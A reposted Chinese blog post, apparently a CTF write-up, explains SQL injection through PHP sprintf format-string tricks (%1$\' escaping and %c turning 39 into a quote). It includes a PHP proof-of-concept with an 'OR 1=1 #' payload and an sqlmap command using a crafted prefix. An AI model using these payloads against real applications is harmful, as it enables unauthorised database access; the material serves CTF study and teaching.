php sprintf格式化注入

本文转载自查看原文 2018-07-26 20:58 768 05、{ sql inject/ 03、{ php

URL：http://efa4e2c2b8df4ce69454639f4e3727071652c31167f341a4.game.ichunqiu.com/

简单的说就是sprintf中%1$\'会将\吃掉，导致'的逃逸。%后表示第几个参数，$表示参数类型。

还有一个sprintf漏洞的利用方式：%c起到了类似chr()的效果，将数字39转化为'，从而导致了sql注入。

1 <?php
2  
3 $input1 = '%1$c) OR 1=1 #';
4 $input2 = 39;
5 $sql = "SELECT * FROM foo WHERE bar IN ('$input1') AND baz = %s";
6 $sql = sprintf($sql, $input2);
7 echo $sql;
8 ?>

在这题中，--prefix加个前缀丢进sqlmap跑就好了。

虽然是post

　　sqlmap -r /home/1.txt -p username --prefix="%1$'"

--prefix 前缀

--suffix 后缀

其实也可以直接*

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 sprintf格式化字符串带来的注入隐患 PHP 格式化字符串sprintf() PHP格式化字符串函数 sprintf() sprintf格式化INT64 fmt.Sprintf格式化使用 Golang Printf、Sprintf 、Fprintf 格式化 fmt.Sprintf（格式化输出） sprintf 格式化字符串 PHP中sprintf、printf等字符串格式化输出中的格式规则总结 php sprintf() 函数把格式化的字符串写入一个变量中。